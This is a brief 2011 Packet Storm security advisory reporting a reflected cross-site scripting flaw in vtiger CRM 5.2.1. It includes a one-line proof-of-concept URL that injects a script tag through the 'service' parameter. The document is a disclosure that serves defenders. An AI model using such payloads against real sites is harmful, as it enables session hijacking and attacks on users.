vtiger CRM 5.2.1 Cross Site Scripting

2011-04-07T00:00:00
ID PACKETSTORM:100183
Type packetstorm
Reporter AutoSec Tools
Modified 2011-04-07T00:00:00

Description

                                        
                                            `------------------------------------------------------------------------  
Software................vtiger CRM 5.2.1  
Vulnerability...........Reflected Cross-site Scripting  
Threat Level............Critical (4/5)  
Download................http://www.vtiger.com/  
Discovery Date..........4/5/2011  
Tested On...............Windows Vista + XAMPP  
------------------------------------------------------------------------  
Author..................AutoSec Tools  
Site....................http://www.autosectools.com/  
Email...................John Leitch <john@autosectools.com>  
------------------------------------------------------------------------  
  
  
--Description--  
  
A reflected cross-site scripting vulnerability in vtiger CRM 5.2.1 can  
be exploited to execute arbitrary JavaScript.  
  
  
--PoC--  
  
http://localhost/vtigercrm/vtigerservice.php?service=%3Cscript%3Ealert%280%29%3C/script%3E  
`